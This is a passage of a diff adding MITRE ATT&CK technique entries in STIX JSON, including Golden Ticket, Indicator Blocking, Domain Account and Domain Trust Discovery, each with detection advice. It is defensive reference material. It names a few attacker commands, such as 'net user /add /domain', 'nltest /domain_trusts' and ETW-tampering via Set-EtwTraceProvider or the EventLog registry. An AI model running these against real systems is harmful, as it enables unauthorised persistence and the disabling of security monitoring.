"x_mitre_contributors": [ + "Jon Sheedy", + "Heather Linn", + "Walker Johnson" + ], + "x_mitre_detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server or between clients that should not or often do not communicate with one another). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. (Citation: University of Birmingham C2)\n\nConsider monitoring for traffic to known anonymity networks (such as [Tor](https://attack.mitre.org/software/S0183)).", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows", + "Network" + ], + "x_mitre_version": "3.1", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--731f4f55-b6d0-41d1-a7a9-072a66389aea", + "created": "2017-05-31T21:31:08.479Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1090", + "external_id": "T1090" + }, + { + "source_name": "Trend Micro APT Attack Tools", + "description": "Wilhoit, K. (2013, March 4). In-Depth Look: APT Attack Tools of the Trade. Retrieved December 2, 2015.", + "url": "http://blog.trendmicro.com/trendlabs-security-intelligence/in-depth-look-apt-attack-tools-of-the-trade/" + }, + { + "source_name": "University of Birmingham C2", + "description": "Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.", + "url": "https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-05-08T20:13:24.241Z", + "name": "Location Identification", + "description": "Adversaries may perform location identification using device data to inform operations and targeted impact for attacks. Location identification data can come in a number of forms, including geographic location, location relative to other control system devices, time zone, and current time. An adversary may use an embedded global positioning system (GPS) module in a device to figure out the physical coordinates of a device. NIST SP800-82 recommends that devices utilize GPS or another location determining mechanism to attach appropriate timestamps to log entries (Citation: Guidance - NIST SP800-82). While this assists in logging and event tracking, an adversary could use the underlying positioning mechanism to determine the general location of a device. An adversary can also infer the physical location of serially connected devices by using serial connection enumeration. \n\nAn adversary attempt to attack and cause Impact could potentially affect other control system devices in close proximity. Device local-time and time-zone settings can also provide adversaries a rough indicator of device location, when specific geographic identifiers cannot be determined from the system.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "collection" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_deprecated": true, + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows", + "Control Server" + ], + "x_mitre_version": "1.0", + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--7374ab87-0782-41f8-b415-678c0950bb2a", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-ics-attack", + "url": "https://attack.mitre.org/techniques/T0825", + "external_id": "T0825" + }, + { + "source_name": "Guidance - NIST SP800-82", + "description": "Keith Stouffer. (2015, May). Guide to Industrial Control Systems (ICS) Security. Retrieved March 28, 2018.", + "url": "https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-82r2.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-05-09T14:00:00.188Z", + "name": "Command and Scripting Interpreter", + "description": "Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of [Unix Shell](https://attack.mitre.org/techniques/T1059/004) while Windows installations include the [Windows Command Shell](https://attack.mitre.org/techniques/T1059/003) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).\n\nThere are also cross-platform interpreters such as [Python](https://attack.mitre.org/techniques/T1059/006), as well as those commonly associated with client applications such as [JavaScript](https://attack.mitre.org/techniques/T1059/007) and [Visual Basic](https://attack.mitre.org/techniques/T1059/005).\n\nAdversaries may abuse these technologies in various ways as a means of executing arbitrary commands. Commands and scripts can be embedded in [Initial Access](https://attack.mitre.org/tactics/TA0001) payloads delivered to victims as lure documents or as secondary payloads downloaded from an existing C2. Adversaries may also execute commands through interactive terminals/shells, as well as utilize various [Remote Services](https://attack.mitre.org/techniques/T1021) in order to achieve remote Execution.(Citation: Powershell Remote Commands)(Citation: Cisco IOS Software Integrity Assurance - Command History)(Citation: Remote Shell Execution in Python)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "execution" + } + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_contributors": [], + "x_mitre_deprecated": false, + "x_mitre_detection": "Command-line and scripting activities can be captured through proper logging of process execution with command-line arguments. This information can be useful in gaining additional insight to adversaries' actions through how they use native processes or custom tools. Also monitor for loading of modules associated with specific languages.\n\nIf scripting is restricted for normal users, then any attempt to enable scripts running on a system would be considered suspicious. If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions are suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.\n\nScripts are likely to perform actions with various effects on a system that may generate events, depending on the types of monitoring used. Monitor processes and command-line arguments for script execution and subsequent behavior. Actions may be related to network and system information discovery, collection, or other scriptable post-compromise behaviors and could be used as indicators of detection leading back to the source script.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows", + "Network", + "Office 365", + "Azure AD", + "IaaS", + "Google Workspace" + ], + "x_mitre_version": "2.4", + "x_mitre_data_sources": [], + "x_mitre_remote_support": true, + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--7385dfaf-6886-4229-9ecd-6fd678040830", + "created": "2017-05-31T21:30:49.546Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1059", + "external_id": "T1059" + }, + { + "source_name": "Remote Shell Execution in Python", + "description": "Abdou Rockikz. (2020, July). How to Execute Shell Commands in a Remote Machine in Python. Retrieved July 26, 2021.", + "url": "https://www.thepythoncode.com/article/executing-bash-commands-remotely-in-python" + }, + { + "source_name": "Cisco IOS Software Integrity Assurance - Command History", + "description": "Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Command History. Retrieved October 21, 2020.", + "url": "https://tools.cisco.com/security/center/resources/integrity_assurance.html#23" + }, + { + "source_name": "Powershell Remote Commands", + "description": "Microsoft. (2020, August 21). Running Remote Commands. Retrieved July 26, 2021.", + "url": "https://docs.microsoft.com/en-us/powershell/scripting/learn/remoting/running-remote-commands?view=powershell-7.1" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2024-02-14T21:50:32.531Z", + "name": "Indicator Blocking", + "description": "An adversary may attempt to block indicators or events typically captured by sensors from being gathered and analyzed. This could include maliciously redirecting(Citation: Microsoft Lamin Sept 2017) or even disabling host-based sensors, such as Event Tracing for Windows (ETW)(Citation: Microsoft About Event Tracing 2018), by tampering settings that control the collection and flow of event telemetry.(Citation: Medium Event Tracing Tampering 2018) These settings may be stored on the system in configuration files and/or in the Registry as well as being accessible via administrative utilities such as [PowerShell](https://attack.mitre.org/techniques/T1059/001) or [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047).\n\nFor example, adversaries may modify the `File` value in HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\Security to hide their malicious actions in a new or different .evtx log file. This action does not require a system reboot and takes effect immediately.(Citation: disable_win_evt_logging) \n\nETW interruption can be achieved multiple ways, however most directly by defining conditions using the [PowerShell](https://attack.mitre.org/techniques/T1059/001) Set-EtwTraceProvider cmdlet or by interfacing directly with the Registry to make alterations.\n\nIn the case of network-based reporting of indicators, an adversary may block traffic associated with reporting to prevent central analysis. This may be accomplished by many means, such as stopping a local process responsible for forwarding telemetry and/or creating a host-based firewall rule to block traffic to specific hosts responsible for aggregating events, such as security information and event management (SIEM) products.\n\nIn Linux environments, adversaries may disable or reconfigure log processing tools such as syslog or nxlog to inhibit detection and monitoring capabilities to facilitate follow on behaviors (Citation: LemonDuck).", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Rob Smith", + "Lucas Heiligenstein" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Detect lack of reported activity from a host sensor. Different methods of blocking may cause different disruptions in reporting. Systems may suddenly stop reporting all data or only certain kinds of data.\n\nDepending on the types of host information collected, an analyst may be able to detect the event that triggered a process to stop or connection to be blocked. For example, Sysmon will log when its configuration state has changed (Event ID 16) and Windows Management Instrumentation (WMI) may be used to subscribe ETW providers that log any provider removal from a specific trace session. (Citation: Medium Event Tracing Tampering 2018) To detect changes in ETW you can also monitor the registry key which contains configurations for all ETW event providers: HKLM\\SYSTEM\\CurrentControlSet\\Control\\WMI\\Autologger\\AUTOLOGGER_NAME\\{PROVIDER_GUID}", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows", + "macOS", + "Linux" + ], + "x_mitre_version": "1.4", + "x_mitre_data_sources": [], + "x_mitre_defense_bypassed": [ + "Anti-virus", + "Host intrusion prevention systems" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--74d2a63f-3c7b-4852-92da-02d8fbab16da", + "created": "2020-03-19T19:09:30.329Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1562/006", + "external_id": "T1562.006" + }, + { + "source_name": "disable_win_evt_logging", + "description": "Heiligenstein, L. (n.d.). REP-25: Disable Windows Event Logging. Retrieved April 7, 2022.", + "url": "https://ptylu.github.io/content/report/report.html?report=25" + }, + { + "source_name": "LemonDuck", + "description": "Manoj Ahuje. (2022, April 21). LemonDuck Targets Docker for Cryptomining Operations. Retrieved June 30, 2022.", + "url": "https://www.crowdstrike.com/blog/lemonduck-botnet-targets-docker-for-cryptomining-operations/" + }, + { + "source_name": "Microsoft Lamin Sept 2017", + "description": "Microsoft. (2009, May 17). Backdoor:Win32/Lamin.A. Retrieved September 6, 2018.", + "url": "https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?name=Backdoor:Win32/Lamin.A" + }, + { + "source_name": "Microsoft About Event Tracing 2018", + "description": "Microsoft. (2018, May 30). About Event Tracing. Retrieved June 7, 2019.", + "url": "https://docs.microsoft.com/en-us/windows/desktop/etw/consuming-events" + }, + { + "source_name": "Medium Event Tracing Tampering 2018", + "description": "Palantir. (2018, December 24). Tampering with Windows Event Tracing: Background, Offense, and Defense. Retrieved June 7, 2019.", + "url": "https://medium.com/palantir/tampering-with-windows-event-tracing-background-offense-and-defense-4be7ac62ac63" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2024-02-01T04:37:36.774Z", + "name": "Domain Account", + "description": "Adversaries may create a domain account to maintain access to victim systems. Domain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain. Domain accounts can cover user, administrator, and service accounts. With a sufficient level of access, the net user /add /domain command can be used to create a domain account.(Citation: Savill 1999)\n\nSuch accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [], + "x_mitre_deprecated": false, + "x_mitre_detection": "Monitor for processes and command-line parameters associated with domain account creation, such as net user /add /domain. Collect data on account creation within a network. Event ID 4720 is generated when a user account is created on a Windows domain controller. (Citation: Microsoft User Creation Event) Perform regular audits of domain accounts to detect suspicious accounts that may have been created by an adversary.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows", + "macOS", + "Linux" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--7610cada-1499-41a4-b3dd-46467b68d177", + "created": "2020-01-28T14:05:17.825Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1136/002", + "external_id": "T1136.002" + }, + { + "source_name": "Microsoft User Creation Event", + "description": "Lich, B., Miroshnikov, A. (2017, April 5). 4720(S): A user account was created. Retrieved June 30, 2017.", + "url": "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4720" + }, + { + "source_name": "Savill 1999", + "description": "Savill, J. (1999, March 4). Net.exe reference. Retrieved September 22, 2015.", + "url": "https://web.archive.org/web/20150511162820/http://windowsitpro.com/windows/netexe-reference" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "Employee Names", + "description": "Adversaries may gather employee names that can be used during targeting. Employee names be used to derive email addresses as well as to help guide other reconnaissance efforts and/or craft more-believable lures.\n\nAdversaries may easily gather employee names, since they may be readily available and exposed via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: OPM Leak) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Phishing](https://attack.mitre.org/techniques/T1566) or [Valid Accounts](https://attack.mitre.org/techniques/T1078)).", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "reconnaissance" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "PRE" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--76551c52-b111-4884-bc47-ff3e728f0156", + "created": "2020-10-02T14:57:15.906Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1589/003", + "external_id": "T1589.003" + }, + { + "source_name": "OPM Leak", + "description": "Cybersecurity Resource Center. (n.d.). CYBERSECURITY INCIDENTS. Retrieved October 20, 2020.", + "url": "https://www.opm.gov/cybersecurity/cybersecurity-incidents/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-11-08T14:00:00.188Z", + "name": "Domain Trust Discovery", + "description": "Adversaries may attempt to gather information on domain trust relationships that may be used to identify lateral movement opportunities in Windows multi-domain/forest environments. Domain trusts provide a mechanism for a domain to allow access to resources based on the authentication procedures of another domain.(Citation: Microsoft Trusts) Domain trusts allow the users of the trusted domain to access resources in the trusting domain. The information discovered may help the adversary conduct [SID-History Injection](https://attack.mitre.org/techniques/T1134/005), [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003), and [Kerberoasting](https://attack.mitre.org/techniques/T1558/003).(Citation: AdSecurity Forging Trust Tickets)(Citation: Harmj0y Domain Trusts) Domain trusts can be enumerated using the `DSEnumerateDomainTrusts()` Win32 API call, .NET methods, and LDAP.(Citation: Harmj0y Domain Trusts) The Windows utility [Nltest](https://attack.mitre.org/software/S0359) is known to be used by adversaries to enumerate domain trusts.(Citation: Microsoft Operation Wilysupply)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "discovery" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "Dave Westgard", + "Elia Florio, Microsoft", + "Mnemonic", + "RedHuntLabs, @redhuntlabs", + "ExtraHop" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation but as part of a chain of behavior that could lead to other activities based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information, such as `nltest /domain_trusts`. Remote access tools with built-in features may interact directly with the Windows API to gather information. Look for the `DSEnumerateDomainTrusts()` Win32 API call to spot activity associated with [Domain Trust Discovery](https://attack.mitre.org/techniques/T1482).(Citation: Harmj0y Domain Trusts) Information may also be acquired through Windows system management tools such as [PowerShell](https://attack.mitre.org/techniques/T1059/001). The .NET method `GetAllTrustRelationships()` can be an indicator of [Domain Trust Discovery](https://attack.mitre.org/techniques/T1482).(Citation: Microsoft GetAllTrustRelationships)\n", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.2", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--767dbf9e-df3f-45cb-8998-4903ab5f80c0", + "created": "2019-02-14T16:15:05.974Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1482", + "external_id": "T1482" + }, + { + "source_name": "Microsoft Operation Wilysupply", + "description": "Florio, E.. (2017, May 4). Windows Defender ATP thwarts Operation WilySupply software supply chain cyberattack. Retrieved February 14, 2019.", + "url": "https://www.microsoft.com/security/blog/2017/05/04/windows-defender-atp-thwarts-operation-wilysupply-software-supply-chain-cyberattack/" + }, + { + "source_name": "AdSecurity Forging Trust Tickets", + "description": "Metcalf, S. (2015, July 15). It’s All About Trust – Forging Kerberos Trust Tickets to Spoof Access across Active Directory Trusts. Retrieved February 14, 2019.", + "url": "https://adsecurity.org/?p=1588" + }, + { + "source_name": "Microsoft Trusts", + "description": "Microsoft. (2009, October 7). Trust Technologies. Retrieved February 14, 2019.", + "url": "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2003/cc759554(v=ws.10)" + }, + { + "source_name": "Microsoft GetAllTrustRelationships", + "description": "Microsoft. (n.d.). Domain.GetAllTrustRelationships Method. Retrieved February 14, 2019.", + "url": "https://docs.microsoft.com/en-us/dotnet/api/system.directoryservices.activedirectory.domain.getalltrustrelationships?redirectedfrom=MSDN&view=netframework-4.7.2#System_DirectoryServices_ActiveDirectory_Domain_GetAllTrustRelationships" + }, + { + "source_name": "Harmj0y Domain Trusts", + "description": "Schroeder, W. (2017, October 30). A Guide to Attacking Domain Trusts. Retrieved February 14, 2019.", + "url": "https://posts.specterops.io/a-guide-to-attacking-domain-trusts-971e52cb2944" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "Golden Ticket", + "description": "Adversaries who have the KRBTGT account password hash may forge Kerberos ticket-granting tickets (TGT), also known as a golden ticket.(Citation: AdSecurity Kerberos GT Aug 2015) Golden tickets enable adversaries to generate authentication material for any account in Active Directory.(Citation: CERT-EU Golden Ticket Protection) \n\nUsing a golden ticket, adversaries are then able to request ticket granting service (TGS) tickets, which enable access to specific resources. Golden tickets require adversaries to interact with the Key Distribution Center (KDC) in order to obtain TGS.(Citation: ADSecurity Detecting Forged Tickets)\n\nThe KDC service runs all on domain controllers that are part of an Active Directory domain. KRBTGT is the Kerberos Key Distribution Center (KDC) service account and is responsible for encrypting and signing all Kerberos tickets.(Citation: ADSecurity Kerberos and KRBTGT) The KRBTGT password hash may be obtained using [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) and privileged access to a domain controller.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "credential-access" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "Itamar Mizrahi, Cymptom" + ], + "x_mitre_detection": "Monitor for anomalous Kerberos activity, such as malformed or blank fields in Windows logon/logoff events (Event ID 4624, 4672, 4634), RC4 encryption within TGTs, and TGS requests without preceding TGT requests.(Citation: ADSecurity Kerberos and KRBTGT)(Citation: CERT-EU Golden Ticket Protection)(Citation: Stealthbits Detect PtT 2019)\n\nMonitor the lifetime of TGT tickets for values that differ from the default domain duration.(Citation: Microsoft Kerberos Golden Ticket)\n\nMonitor for indications of [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003) being used to move laterally. \n", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [], + "x_mitre_permissions_required": [ + "User" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--768dce68-8d0d-477a-b01d-0eea98b963a1", + "created": "2020-02-11T19:13:33.643Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1558/001", + "external_id": "T1558.001" + }, + { + "source_name": "AdSecurity Kerberos GT Aug 2015", + "description": "Metcalf, S. (2015, August 7). Kerberos Golden Tickets are Now More Golden. Retrieved December 1, 2017.", + "url": "https://adsecurity.org/?p=1640" + }, + { + "source_name": "CERT-EU Golden Ticket Protection", + "description": "Abolins, D., Boldea, C., Socha, K., Soria-Machado, M. (2016, April 26). Kerberos Golden Ticket Protection. Retrieved July 13, 2017.", + "url": "https://cert.europa.eu/static/WhitePapers/UPDATED%20-%20CERT-EU_Security_Whitepaper_2014-007_Kerberos_Golden_Ticket_Protection_v1_4.pdf" + }, + { + "source_name": "ADSecurity Detecting Forged Tickets", + "description": "Metcalf, S. (2015, May 03). Detecting Forged Kerberos Ticket (Golden Ticket & Silver Ticket) Use in Active Directory. Retrieved December 23, 2015.", + "url": "https://adsecurity.org/?p=1515" + }, + { + "source_name": "ADSecurity Kerberos and KRBTGT", + "description": "Sean Metcalf. (2014, November 10). Kerberos & KRBTGT: Active Directory’s Domain Kerberos Service Account. Retrieved January 30, 2020.", + "url": "https://adsecurity.org/?p=483" + }, + { + "source_name": "Stealthbits Detect PtT 2019", + "description": "Jeff Warren. (2019, February 19). How to Detect Pass-the-Ticket Attacks. Retrieved February 27, 2020.", + "url": "https://blog.stealthbits.com/detect-pass-the-ticket-attacks" + }, + { + "source_name": "Microsoft Kerberos Golden Ticket", + "description": "Microsoft. (2015, March 24). Kerberos Golden Ticket Check (Updated). Retrieved February 27, 2020.", + "url": "https://gallery.technet.microsoft.com/scriptcenter/Kerberos-Golden-Ticket-b4814285" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2021-01-27T14:49:39.188Z", + "name": "Component Object Model and Distributed COM", + "description": "**This technique has been deprecated. Please use [Distributed Component Object Model](https://attack.mitre.org/techniques/T1021/003) and [Component Object Model](https://attack.mitre.org/techniques/T1559/001).**\n\nAdversaries may use the Windows Component Object Model (COM) and Distributed Component Object Model (DCOM) for local code execution or to execute on remote systems as part of lateral movement. \n\nCOM is a component of the native Windows application programming interface (API) that enables interaction between software objects, or executable code that implements one or more interfaces.(Citation: Fireeye Hunting COM June 2019) Through COM, a client object can call methods of server objects, which are typically Dynamic Link Libraries (DLL) or executables (EXE).(Citation: Microsoft COM) DCOM is transparent middleware that extends the functionality of Component Object Model (COM) (Citation: Microsoft COM) beyond a local computer using remote procedure call (RPC) technology.(Citation: Fireeye Hunting COM June 2019)\n\nPermissions to interact with local and remote server COM objects are specified by access control lists (ACL) in the Registry. (Citation: Microsoft COM ACL)(Citation: Microsoft Process Wide Com Keys)(Citation: Microsoft System Wide Com Keys) By default, only Administrators may remotely activate and launch COM objects through DCOM.\n\nAdversaries may abuse COM for local command and/or payload execution. Various COM interfaces are exposed that can be abused to invoke arbitrary execution via a variety of programming languages such as C, C++, Java, and VBScript.(Citation: Microsoft COM) Specific COM objects also exists to directly perform functions beyond code execution, such as creating a [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053), fileless download/execution, and other adversary behaviors such as Privilege Escalation and Persistence.(Citation: Fireeye Hunting COM June 2019)(Citation: ProjectZero File Write EoP Apr 2018)\n\nAdversaries may use DCOM for lateral movement. Through DCOM, adversaries operating in the context of an appropriately privileged user can remotely obtain arbitrary and even direct shellcode execution through Office applications (Citation: Enigma Outlook DCOM Lateral Movement Nov 2017) as well as other Windows objects that contain insecure methods.(Citation: Enigma MMC20 COM Jan 2017)(Citation: Enigma DCOM Lateral Movement Jan 2017) DCOM can also execute macros in existing documents (Citation: Enigma Excel DCOM Sept 2017) and may also invoke [Dynamic Data Exchange](https://attack.mitre.org/techniques/T1173) (DDE) execution directly through a COM created instance of a Microsoft Office application (Citation: Cyberreason DCOM DDE Lateral Movement Nov 2017), bypassing the need for a malicious document.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "lateral-movement" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "execution" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_deprecated": true, + "x_mitre_detection": "Monitor for COM objects loading DLLs and other modules not typically associated with the application.(Citation: Enigma Outlook DCOM Lateral Movement Nov 2017) Enumeration of COM objects, via [Query Registry](https://attack.mitre.org/techniques/T1012) or [PowerShell](https://attack.mitre.org/techniques/T1086), may also proceed malicious use.(Citation: Fireeye Hunting COM June 2019)(Citation: Enigma MMC20 COM Jan 2017)\n\nMonitor for spawning of processes associated with COM objects, especially those invoked by a user different than the one currently logged on.\n\nMonitor for any influxes or abnormal increases in Distributed Computing Environment/Remote Procedure Call (DCE/RPC) traffic.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "2.0", + "x_mitre_data_sources": [], + "x_mitre_permissions_required": [ + "Administrator", + "SYSTEM", + "User" + ], + "x_mitre_remote_support": true, + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--772bc7a8-a157-42cc-8728-d648e25c7fe7", + "created": "2018-01-16T16:13:52.465Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1175", + "external_id": "T1175" + }, + { + "source_name": "Fireeye Hunting COM June 2019", + "description": "Hamilton, C. (2019, June 4). Hunting COM Objects. Retrieved June 10, 2019.", + "url": "https://www.fireeye.com/blog/threat-research/2019/06/hunting-com-objects.html" + }, + { + "source_name": "Microsoft COM", + "description": "Microsoft. (n.d.). Component Object Model (COM). Retrieved November 22, 2017.", + "url": "https://msdn.microsoft.com/library/windows/desktop/ms680573.aspx" + }, + { + "source_name": "Microsoft COM ACL", + "description": "Microsoft. (n.d.). DCOM Security Enhancements in Windows XP Service Pack 2 and Windows Server 2003 Service Pack 1. Retrieved November 22, 2017.", + "url": "https://docs.microsoft.com/en-us/windows/desktop/com/dcom-security-enhancements-in-windows-xp-service-pack-2-and-windows-server-2003-service-pack-1" + }, + { + "source_name": "Microsoft Process Wide Com Keys", + "description": "Microsoft. (n.d.). Setting Process-Wide Security Through the Registry. Retrieved November 21, 2017.", + "url": "https://msdn.microsoft.com/en-us/library/windows/desktop/ms687317(v=vs.85).aspx" + }, + { + "source_name": "Microsoft System Wide Com Keys", + "description": "Microsoft. (n.d.). Registry Values for System-Wide Security. Retrieved November 21, 2017.", + "url": "https://msdn.microsoft.com/en-us/library/windows/desktop/ms694331(v=vs.85).aspx" + }, + { + "source_name": "ProjectZero File Write EoP Apr 2018", + "description": "Forshaw, J. (2018, April 18). Windows Exploitation Tricks: Exploiting Arbitrary File Writes for Local Elevation of Privilege. Retrieved May 